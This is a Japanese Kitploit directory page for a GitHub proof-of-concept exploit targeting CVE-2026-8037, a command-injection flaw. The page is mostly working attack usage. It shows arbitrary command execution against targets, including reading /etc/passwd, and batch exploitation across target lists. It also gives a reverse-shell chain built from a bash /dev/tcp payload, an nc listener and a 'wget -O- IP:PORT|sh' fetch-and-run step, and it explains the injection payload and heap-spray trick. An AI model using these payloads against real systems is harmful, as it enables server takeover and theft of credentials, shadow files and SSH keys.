Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/caster-chen/cve-2026-8037-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

実行可能なコマンドの探索とワンクリックgetshell(サーバーにサービスのデプロイが必要)

リポジトリを見る
32ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-8037-POC

実行可能なコマンド検出とワンクリックgetshell(サーバー側にサービスをデプロイする必要あり)が含まれます。 pco.yaml を nuclei と組み合わせて素早く検出できます。

クイックスタート

対話モード

root@kitploit:~
python go.py

ターゲットURLを入力 → 機能メニューを選択するだけです。

ターゲットの検出

root@kitploit:~
# 高速検出(基本情報8項目)
python go.py -t https://IP:PORT --probe fast

# 詳細検出(全コマンド:30+項目)
python go.py -t https://IP:PORT --probe deep

# バッチ検出
python go.py -f vulnerable_targets.txt --probe fast

コマンド実行

root@kitploit:~
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"

# バッチ並行実行(20スレッド)
python go.py -f targets.txt -c "hostname" --batch 20

ワンクリックリバースシェル

攻撃機で2つのターミナルを開きます:

root@kitploit:~
# ターミナル 1 - HTTPサービス(rev.shを提供)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# ターミナル 2 - リバース待機
nc -lvnp 8088

その後ペイロードを送信:

root@kitploit:~
# 単一ターゲット
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# バッチ(逐次、一度に1つだけ受信可能)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

スクリプトは送信前に準備手順を表示します。


詳細検出内容


インジェクションの原理

root@kitploit:~
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAA'; <コマンド> #", ...}
  • apiuser="''''" により escape_quotes() の null 終端未処理の脆弱性をトリガー
  • g0~g60 でヒープスプレーを61回行い、成功率を向上
  • '; <コマンド> # でコンテキストを閉じ、# で以降をコメントアウト

長さ制限

echo タグを使用しない場合、34文字が利用可能:

root@kitploit:~
wget -O- IP:PORT|sh    (31 文字)

パイプチェーン:wgetダウンロード → sh実行 → bashで指定ポートにリバース接続。


パラメータ一覧

ツールをダウンロード
カテゴリコマンド
基本情報hostname, uname -a, kernel, OS release, uptime
ユーザーid, whoami, users/w/who
ネットワークifconfig, route, arp, listening ports, connections, iptables
システムprocesses, cpuinfo, meminfo, disk, mount
ファイルls / /root /tmp /home /etc
設定crontab, passwd, shadow, sudoers, SSH keys
拡張config search, scripts, docker, containers
パラメータ説明
-t, --target URLターゲットアドレス
-f, --file FILEターゲットリストファイル
-l, --lhost IP攻撃機のIP
-p, --lport PORTHTTPサービスポート (デフォルト 8087)
-n, --ncport PORTnc 待受ポート (デフォルト 8088)
-c, --cmd CMD実行するコマンド
--probe fast/deep高速/詳細検出
--batch Nバッチ並行数 (デフォルトは逐次)